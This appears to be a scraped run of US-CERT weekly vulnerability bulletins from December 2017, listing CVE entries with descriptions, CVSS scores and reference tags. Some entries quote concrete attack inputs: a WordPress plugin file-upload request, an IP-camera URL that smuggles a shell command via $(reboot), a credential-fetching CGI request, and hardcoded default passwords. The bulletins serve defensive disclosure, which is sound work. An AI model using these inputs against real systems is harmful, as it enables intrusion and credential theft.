 		Samsung Internet Browser 5.4.02.3 allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via crafted JavaScript code.2017-12-21not yet calculatedCVE-2017-17692
MISC
MISC
softonic -- telegram_messenger_app
 		The saveFile method in MediaController.java in the Telegram Messenger application before 2017-12-08 for Android allows directory traversal via a pathname obtained in a file-transfer request from a remote peer, as demonstrated by writing to tgnet.dat or tgnet.dat.bak.2017-12-16not yet calculatedCVE-2017-17715
MISC
solarwinds -- multiple_products
 		SQL injection vulnerability in the LoginServlet page in SolarWinds Storage Manager before 5.1.2, SolarWinds Storage Profiler before 5.1.2, and SolarWinds Backup Profiler before 5.1.2 allows remote attackers to execute arbitrary SQL commands via the loginName field.2017-12-20not yet calculatedCVE-2012-2576
EXPLOIT-DB
EXPLOIT-DB
BID
CONFIRM
XF
sonatype -- nexus_repository_manager
 		Sonatype Nexus Repository Manager through 2.14.5 has weak password encryption with a hardcoded CMMDwoV value in the LDAP integration feature.2017-12-17not yet calculatedCVE-2017-17717
MISC
sony -- music_center_for_pc
 		Untrusted search path vulnerability in Music Center for PC version 1.0.01 and earlier allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.2017-12-22not yet calculatedCVE-2017-10909
JVN
spiqe_software -- onethird_cms_show_off
 		Directory traversal vulnerability in OneThird CMS Show Off v1.85 and earlier. Show Off v1.85 en and earlier allows an attacker to read arbitrary files via unspecified vectors.2017-12-22not yet calculatedCVE-2017-10907
JVN
CONFIRM
superbeam -- superbeam
 		SuperBeam through 4.1.3, when using the LAN or WiFi Direct Share feature, does not use HTTPS or any integrity-protection mechanism for file transfer, which makes it easier for remote attackers to send crafted files, as demonstrated by APK injection.2017-12-19not yet calculatedCVE-2017-17763
MISC
symantec -- messaging_gateway
 		Prior to 10.6.4, Symantec Messaging Gateway may be susceptible to a path traversal attack (also known as directory traversal). These types of attacks aim to access files and directories that are stored outside the web root folder. By manipulating variables, it may be possible to access arbitrary files and directories stored on the file system including application source code or configuration and critical system files.2017-12-20not yet calculatedCVE-2017-15532
BID
CONFIRM
syncbreeze -- syncbreeze
 		The Enterprise version of SyncBreeze 10.2.12 and earlier is affected by a Remote Denial of Service vulnerability. The web server does not check bounds when reading server requests in the Host header on making a connection, resulting in a classic Buffer Overflow that causes a Denial of Service.2017-12-19not yet calculatedCVE-2017-17088
MISC
FULLDISC
EXPLOIT-DB
synology -- diskstation_manager
 		An improper access control vulnerability in synodsmnotify in Synology DiskStation Manager (DSM) before 6.1.4-15217 and before 6.0.3-8754-6 allows local users to inject arbitrary web script or HTML via the -fn option.2017-12-22not yet calculatedCVE-2017-16766
CONFIRM
synology -- photo_station
 		Cross-site scripting (XSS) vulnerability in PixlrEditorHandler.php in Synology Photo Station before 6.8.0-3456 allows remote authenticated users to inject arbitrary web scripts or HTML via the id parameter.2017-12-20not yet calculatedCVE-2017-12072
CONFIRM
tg_soft -- vir.it_explorer_liteIn TG Soft Vir.IT eXplorer Lite 8.5.65, the driver file (VIRAGTLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x8273E060.2017-12-20not yet calculatedCVE-2017-17801
MISC
tg_soft -- vir.it_explorer_lite
 		In TG Soft Vir.IT eXplorer Lite 8.5.42, the driver file (VIRAGTLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x8273A0A0, a different vulnerability than CVE-2017-17800.2017-12-20not yet calculatedCVE-2017-17798
MISC
tg_soft -- vir.it_explorer_lite
 		In TG Soft Vir.IT eXplorer Lite 8.5.65, the driver file (VIRAGTLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x8273E080.2017-12-20not yet calculatedCVE-2017-17802
MISC
tg_soft -- vir.it_explorer_lite
 		In TG Soft Vir.IT eXplorer Lite 8.5.65, the driver file (VIRAGTLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x82736068, a different vulnerability than CVE-2017-17475.2017-12-20not yet calculatedCVE-2017-17803
MISC
tg_soft -- vir.it_explorer_lite
 		In TG Soft Vir.IT eXplorer Lite 8.5.65, the driver file (VIRAGTLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x82730068.2017-12-20not yet calculatedCVE-2017-17799
MISC
tg_soft -- vir.it_explorer_lite
 		In TG Soft Vir.IT eXplorer Lite 8.5.65, the driver file (VIRAGTLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x827300A4.2017-12-20not yet calculatedCVE-2017-17796
MISC
tg_soft -- vir.it_explorer_lite
 		In TG Soft Vir.IT eXplorer Lite 8.5.65, the driver file (VIRAGTLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x8273A0A0, a different vulnerability than CVE-2017-17798.2017-12-20not yet calculatedCVE-2017-17800
MISC
tp-link -- multiple_products
 		TP-Link TL-WVR and TL-WAR devices allow remote authenticated users to execute arbitrary commands via shell metacharacters in the interface field of an admin/wportal command to cgi-bin/luci, related to the get_device_byif function in /usr/lib/lua/luci/controller/admin/wportal.lua in uhttpd.2017-12-19not yet calculatedCVE-2017-17757
MISC
tp-link -- multiple_products
 		TP-Link TL-WVR and TL-WAR devices allow remote authenticated users to execute arbitrary commands via shell metacharacters in the interface field of an admin/dhcps command to cgi-bin/luci, related to the zone_get_iface_bydev function in /usr/lib/lua/luci/controller/admin/dhcps.lua in uhttpd.2017-12-19not yet calculatedCVE-2017-17758
MISC
tp-link -- tl-sg108e_device
 		Weak access control methods on the TP-Link TL-SG108E 1.0.0 allow any user on a NAT network with an authenticated administrator to access the device without entering user credentials. The authentication record is stored on the device; thus if an administrator authenticates from a NAT network, the authentication applies to the IP address of the NAT gateway, and any user behind that NAT gateway is also treated as authenticated.2017-12-20not yet calculatedCVE-2017-17746
FULLDISC
tp-link -- tl-sg108e_device
 		Cross-site scripting (XSS) vulnerability in system_name_set.cgi in TP-Link TL-SG108E 1.0.0 allows authenticated remote attackers to submit arbitrary java script via the 'sysName' parameter.2017-12-20not yet calculatedCVE-2017-17745
FULLDISC
tp-link -- tl-sg108e_device
 		Weak access controls in the Device Logout functionality on the TP-Link TL-SG108E v1.0.0 allow remote attackers to call the logout functionality, triggering a denial of service condition.2017-12-20not yet calculatedCVE-2017-17747
FULLDISC
trape -- trape
 		Trape before 2017-11-05 has XSS via the /nr red parameter, the /nr vId parameter, the /register User-Agent HTTP header, the /register country parameter, the /register countryCode parameter, the /register cpu parameter, the /register isp parameter, the /register lat parameter, the /register lon parameter, the /register org parameter, the /register query parameter, the /register region parameter, the /register regionName parameter, the /register timezone parameter, the /register vId parameter, the /register zip parameter, or the /tping id parameter.2017-12-16not yet calculatedCVE-2017-17714
MISC
MISC
MISC
trape -- trape
 		Trape before 2017-11-05 has SQL injection via the /nr red parameter, the /nr vId parameter, the /register User-Agent HTTP header, the /register country parameter, the /register countryCode parameter, the /register cpu parameter, the /register isp parameter, the /register lat parameter, the /register lon parameter, the /register org parameter, the /register query parameter, the /register region parameter, the /register regionName parameter, the /register timezone parameter, the /register vId parameter, the /register zip parameter, or the /tping id parameter.2017-12-16not yet calculatedCVE-2017-17713
MISC
MISC
MISC
MISC
MISC
urbackup -- urbackup_server
 		Cross - site scripting (XSS) vulnerability in UrBackup Server before 2.1.20 allows remote attackers to inject arbitrary web script or HTML via the action parameter.2017-12-17not yet calculatedCVE-2017-16950
CONFIRM
CONFIRM
videolan -- vlc
 		In VideoLAN VLC media player through 2.2.8, there is a type conversion vulnerability in modules/demux/mp4/libmp4.c in the MP4 demux module leading to a invalid free, because the type of a box may be changed between a read operation and a free operation.2017-12-15not yet calculatedCVE-2017-17670
MISC
BID
vmware -- esxi__and_workstation_and_fusion
 		VMware ESXi (6.5 before ESXi650-201710401-BG), Workstation (12.x before 12.5.8), and Fusion (8.x before 8.5.9) contain a vulnerability that could allow an authenticated VNC session to cause a heap overflow via a specific set of VNC packets resulting in heap corruption. Successful exploitation of this issue could result in remote code execution in a virtual machine via the authenticated VNC session. Note: In order for exploitation to be possible in ESXi, VNC must be manually enabled in a virtual machine's .vmx configuration file. In addition, ESXi must be configured to allow VNC traffic through the built-in firewall.2017-12-20not yet calculatedCVE-2017-4933
CONFIRM
vmware -- esxi__and_workstation_and_fusion
 		VMware ESXi (6.0 before ESXi600-201711101-SG, 5.5 ESXi550-201709101-SG), Workstation (12.x before 12.5.8), and Fusion (8.x before 8.5.9) contain a vulnerability that could allow an authenticated VNC session to cause a stack overflow via a specific set of VNC packets. Successful exploitation of this issue could result in remote code execution in a virtual machine via the authenticated VNC session. Note: In order for exploitation to be possible in ESXi, VNC must be manually enabled in a virtual machine's .vmx configuration file. In addition, ESXi must be configured to allow VNC traffic through the built-in firewall.2017-12-20not yet calculatedCVE-2017-4941
CONFIRM
vmware -- esxi
 		The ESXi Host Client in VMware ESXi (6.5 before ESXi650-201712103-SG, 5.5 before ESXi600-201711103-SG and 5.5 before ESXi550-201709102-SG) contains a vulnerability that may allow for stored cross-site scripting (XSS). An attacker can exploit this vulnerability by injecting Javascript, which might get executed when other users access the Host Client.2017-12-20not yet calculatedCVE-2017-4940
CONFIRM
vmware -- vcenter_server_appliance
 		VMware vCenter Server Appliance (vCSA) (6.5 before 6.5 U1d) contains a local privilege escalation vulnerability via the 'showlog' plugin. Successful exploitation of this issue could result in a low privileged user gaining root level privileges over the appliance base OS.2017-12-20not yet calculatedCVE-2017-4943
CONFIRM
webkit -- webkit
 		WTF/wtf/FastBitVector.h in WebKit, as distributed in Safari Technology Preview Release 46, allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact because it calls the FastBitVectorWordOwner::resizeSlow function (in WTF/wtf/FastBitVector.cpp) for a purpose other than initializing a bitvector size, and resizeSlow mishandles cases where the old array length is greater than the new array length.2017-12-20not yet calculatedCVE-2017-17821
MISC
MISC
wecon -- levistudio_hmi_editor
 		A Heap-based Buffer Overflow issue was discovered in WECON LeviStudio HMI. The heap-based buffer overflow vulnerability has been identified, which may allow remote code execution.2017-12-20not yet calculatedCVE-2017-16717
MISC
wordpress -- wordpress
 		An issue was discovered in the AccessKeys AccessPress Anonymous Post Pro plugin through 3.1.9 for WordPress. Improper input sanitization allows the attacker to override the settings for allowed file extensions and upload file size, related to inc/cores/file-uploader.php and file-uploader/file-uploader-class.php. This allows the attacker to upload anything they want to the server, as demonstrated by an action=ap_file_upload_action&allowedExtensions[]=php request to /wp-admin/admin-ajax.php that results in a .php file upload and resultant PHP code execution.2017-12-18not yet calculatedCVE-2017-16949
MISC
MISC
EXPLOIT-DB
wordpress -- wordpress
 		Multiple cross-site scripting (XSS) vulnerabilities in ui_stats.php in the bSuite plugin before 5 alpha 3 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) s or (2) p parameters to index.php.2017-12-20not yet calculatedCVE-2011-4955
CONFIRM
SECUNIA
CONFIRM
MLIST
MLIST
XF
wordpress -- wordpress
 		Multiple cross-site scripting (XSS) vulnerabilities in the esb-csv-import-export plugin through 1.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) cie_type, (2) cie_import, (3) cie_update, or (4) cie_ignore parameter to includes/admin/views/esb-cie-import-export-page.php.2017-12-19not yet calculatedCVE-2017-17753
MISC
wordpress -- wordpress
 		The Clockwork SMS clockwork-test-message.php component has XSS via a crafted "to" parameter in a clockwork-test-message request to wp-admin/admin.php. This component code is found in the following WordPress plugins: Clockwork Free and Paid SMS Notifications 2.0.3, Two-Factor Authentication - Clockwork SMS 1.0.2, Booking Calendar - Clockwork SMS 1.0.5, Contact Form 7 - Clockwork SMS 2.3.0, Fast Secure Contact Form - Clockwork SMS 2.1.2, Formidable - Clockwork SMS 1.0.2, Gravity Forms - Clockwork SMS 2.2, and WP e-Commerce - Clockwork SMS 2.0.5.2017-12-19not yet calculatedCVE-2017-17780
MISC
MISC
wordpress -- wordpress
 		A cross-site scripting (XSS) vulnerability in the custom-map plugin through 1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the map_id parameter to view/advancedsettings.php.2017-12-19not yet calculatedCVE-2017-17744
MISC
MISC
worpress -- wordpress
 		A cross-site scripting (XSS) vulnerability in the wp-concours plugin through 1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the result_message parameter to includes/concours_page.php.2017-12-19not yet calculatedCVE-2017-17719
MISC
MISC
www.phpautoclassifiedscript -- bus_booking_script
 		Bus Booking Script has XSS via the results.php datepicker parameter or the admin/new_master.php spemail parameter.2017-12-21not yet calculatedCVE-2017-17828
MISC
www.phpautoclassifiedscript -- bus_booking_script
 		Bus Booking Script has SQL Injection via the admin/view_seatseller.php sp_id parameter or the admin/view_member.php memid parameter.2017-12-21not yet calculatedCVE-2017-17829
MISC
www.phpautoclassifiedscript -- bus_booking_script
 		Bus Booking Script has CSRF via admin/new_master.php.2017-12-21not yet calculatedCVE-2017-17830
MISC
www.phpautoclassifiedscript -- bus_booking_script
 		Bus Booking Script 1.0 has SQL Injection via the txtname parameter to admin/index.php.2017-12-18not yet calculatedCVE-2017-17645
MISC
EXPLOIT-DB
xiongmai_technology -- multiple_products
 		A Stack-based Buffer Overflow issue was discovered in Xiongmai Technology IP Cameras and DVRs using the NetSurveillance Web interface. The stack-based buffer overflow vulnerability has been identified, which may allow an attacker to execute code remotely or crash the device. After rebooting, the device restores itself to a more vulnerable state in which Telnet is accessible.2017-12-20not yet calculatedCVE-2017-16725
BID
MISC
zivif -- pr115-204-p-rs_camera
 		Zivif PR115-204-P-RS V2.3.4.2103 web cameras contain a hard-coded cat1029 password for the root user. The SONIX operating system's setup renders this password unchangeable and it can be used to access the device via a TELNET session.2017-12-18not yet calculatedCVE-2017-17107
MISC
FULLDISC
MISC
zivif -- pr115-204-p-rs_camera
 		Zivif PR115-204-P-RS V2.3.4.2103 web cameras are vulnerable to unauthenticated, blind remote command injection via CGI scripts used as part of the web interface, as demonstrated by a cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot) request.2017-12-18not yet calculatedCVE-2017-17105
MISC
FULLDISC
MISC
zivif -- pr115-204-p-rs_camera
 		Credentials for Zivif PR115-204-P-RS V2.3.4.2103 Webcams can be obtained by an unauthenticated remote attacker using a standard web /cgi-bin/hi3510/param.cgi?cmd=getuser HTTP request. This vulnerability exists because of a lack of authentication checks in requests to CGI pages.2017-12-18not yet calculatedCVE-2017-17106
MISC
FULLDISC
MISC
zoom -- zoomlauncher
 		Stack-based buffer overflow in the ZoomLauncher binary in the Zoom client for Linux before 2.0.115900.1201 allows remote attackers to execute arbitrary code by leveraging the zoommtg:// scheme handler.2017-12-19not yet calculatedCVE-2017-15048
MISC
FULLDISC
MISC
EXPLOIT-DB
zoom -- zoomlauncher
 		The ZoomLauncher binary in the Zoom client for Linux before 2.0.115900.1201 does not properly sanitize user input when constructing a shell command, which allows remote attackers to execute arbitrary code by leveraging the zoommtg:// scheme handler.2017-12-19not yet calculatedCVE-2017-15049
MISC
FULLDISC
MISC
EXPLOIT-DB
zuuse_beims -- contractorweb.net
 		CWEBNET/WOSummary/List in ZUUSE BEIMS ContractorWeb .NET 5.18.0.0 allows SQL injection via the tradestatus, assetno, assignto, building, domain, jobtype, site, trade, woType, workorderno, or workorderstatus parameter.2017-12-18not yet calculatedCVE-2017-17721
MISC
Back to top

This product is provided subject to this Notification and this Privacy & Use policy.


Mozilla Releases Security Update for Thunderbird

December 25, 2017, 4:05 pm
$
0
0
Original release date: December 25, 2017

Mozilla has released a security update to address multiple vulnerabilities in Thunderbird. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review the Mozilla Security Advisory for Thunderbird 52.5.2 and apply the necessary update.

This product is provided subject to this Notification and this Privacy & Use policy.


SB18-001: Vulnerability Summary for the Week of December 25, 2017

December 31, 2017, 9:31 pm
$
0
0
Original release date: January 01, 2018

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

 

High Vulnerabilities

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "IOSurface" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.2017-12-259.3CVE-2017-13861
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.2017-12-259.3CVE-2017-13862
BID
SECTRACK
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.2017-12-259.3CVE-2017-13867
BID
SECTRACK
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.2017-12-259.3CVE-2017-13876
BID
SECTRACK
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "IOKit" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.2017-12-279.3CVE-2017-7162
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- iphone_osAn issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. The issue involves the "IOKit" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.2017-12-259.3CVE-2017-13847
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- iphone_osAn issue was discovered in certain Apple products. iOS before 11.2 is affected. The issue involves the "IOMobileFrameBuffer" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.2017-12-259.3CVE-2017-13879
BID
SECTRACK
CONFIRM
apple -- mac_os_xAn issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "IOKit" component. It allows attackers to execute arbitrary code in a privileged context via a crafted app.2017-12-259.3CVE-2017-13848
BID
SECTRACK
CONFIRM
apple -- mac_os_xAn issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "IOKit" component. It allows attackers to execute arbitrary code in a privileged context via a crafted app.2017-12-259.3CVE-2017-13858
BID
SECTRACK
CONFIRM
apple -- mac_os_xAn issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Intel Graphics Driver" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (out-of-bounds read) via a crafted app.2017-12-259.3CVE-2017-13875
BID
SECTRACK
CONFIRM
EXPLOIT-DB
apple -- mac_os_xAn issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Intel Graphics Driver" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.2017-12-259.3CVE-2017-13883
BID
SECTRACK
CONFIRM
apple -- mac_os_xAn issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Intel Graphics Driver" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.2017-12-279.3CVE-2017-7155
CONFIRM
apple -- mac_os_xAn issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "IOAcceleratorFamily" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.2017-12-279.3CVE-2017-7159
CONFIRM
apple -- mac_os_xAn issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Intel Graphics Driver" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.2017-12-279.3CVE-2017-7163
CONFIRM
imagemagick -- imagemagickIn ImageMagick 7.0.7-16 Q16, a vulnerability was found in the function ReadOnePNGImage in coders/png.c, which allows attackers to cause a denial of service (ReadOneMNGImage large loop) via a crafted mng image file.2017-12-277.1CVE-2017-17914
CONFIRM
Back to top

 

Medium Vulnerabilities

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app that triggers type confusion.2017-12-254.3CVE-2017-13855
BID
SECTRACK
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.2017-12-256.8CVE-2017-13856
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.2017-12-254.3CVE-2017-13865
BID
SECTRACK
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.2017-12-256.8CVE-2017-13866
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.2017-12-254.3CVE-2017-13868
BID
SECTRACK
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.2017-12-254.3CVE-2017-13869
BID
SECTRACK
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.2017-12-256.8CVE-2017-13870
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2.1 is affected. tvOS before 11.2.1 is affected. The issue involves the "HomeKit" component. It allows remote attackers to modify the application state by leveraging incorrect message handling, as demonstrated by use of an Apple Watch to obtain an encryption key and unlock a door.2017-12-255.0CVE-2017-13903
BID
SECTRACK
CONFIRM
CONFIRM
MISC
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. The issue involves the "Kernel" component. It allows local users to bypass intended memory-read restrictions or cause a denial of service (system crash).2017-12-275.6CVE-2017-7154
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.2017-12-276.8CVE-2017-7156
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.2017-12-276.8CVE-2017-7157
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tvAn issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.2017-12-276.8CVE-2017-7160
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- icloudAn issue was discovered in certain Apple products. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. The issue involves the "APNs Server" component. It allows man-in-the-middle attackers to track users by leveraging mishandling of client certificates.2017-12-254.3CVE-2017-13864
BID
SECTRACK
CONFIRM
CONFIRM
apple -- iphone_osAn issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. The issue involves the "Mail Drafts" component. It allows man-in-the-middle attackers to read e-mail content by leveraging mishandling of S/MIME credential encryption.2017-12-254.3CVE-2017-13860
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
apple -- iphone_osAn issue was discovered in certain Apple products. iOS before 11.2 is affected. The issue involves the "Mail" component. It might allow remote attackers to bypass an intended encryption protection mechanism by leveraging incorrect S/MIME certificate selection.2017-12-255.0CVE-2017-13874
BID
SECTRACK
CONFIRM
apple -- iphone_osAn issue was discovered in certain Apple products. iOS before 11.2 is affected. The issue involves the "Mail Message Framework" component. It allows remote attackers to spoof the address bar via a crafted web site.2017-12-274.3CVE-2017-7152
CONFIRM
apple -- mac_os_xAn issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Mail" component. It allows remote attackers to read cleartext e-mail content (for which S/MIME encryption was intended) by leveraging the lack of installation of an S/MIME certificate by the recipient.2017-12-255.0CVE-2017-13871
BID
SECTRACK
CONFIRM
apple -- mac_os_xAn issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Intel Graphics Driver" component. It allows local users to bypass intended memory-read restrictions or cause a denial of service (out-of-bounds read and system crash).2017-12-255.6CVE-2017-13878
BID
SECTRACK
CONFIRM
apple -- mac_os_xAn issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Screen Sharing Server" component. It allows attackers to obtain root privileges for reading files by leveraging screen-sharing access.2017-12-276.8CVE-2017-7158
CONFIRM
graphicsmagick -- graphicsmagickIn GraphicsMagick 1.4 snapshot-20171217 Q8, there is a heap-based buffer over-read in ReadNewsProfile in coders/tiff.c, in which LocaleNCompare reads heap data beyond the allocated region.2017-12-276.8CVE-2017-17912
CONFIRM
CONFIRM
graphicsmagick -- graphicsmagickIn GraphicsMagick 1.4 snapshot-20171217 Q8, there is a stack-based buffer over-read in WriteWEBPImage in coders/webp.c, related to an incompatibility with libwebp versions, 0.5.0 and later, that use a different structure type.2017-12-276.8CVE-2017-17913
CONFIRM
CONFIRM
graphicsmagick -- graphicsmagickIn GraphicsMagick 1.4 snapshot-20171217 Q8, there is a heap-based buffer over-read in ReadMNGImage in coders/png.c, related to accessing one byte before testing whether a limit has been reached.2017-12-276.8CVE-2017-17915
CONFIRM
CONFIRM
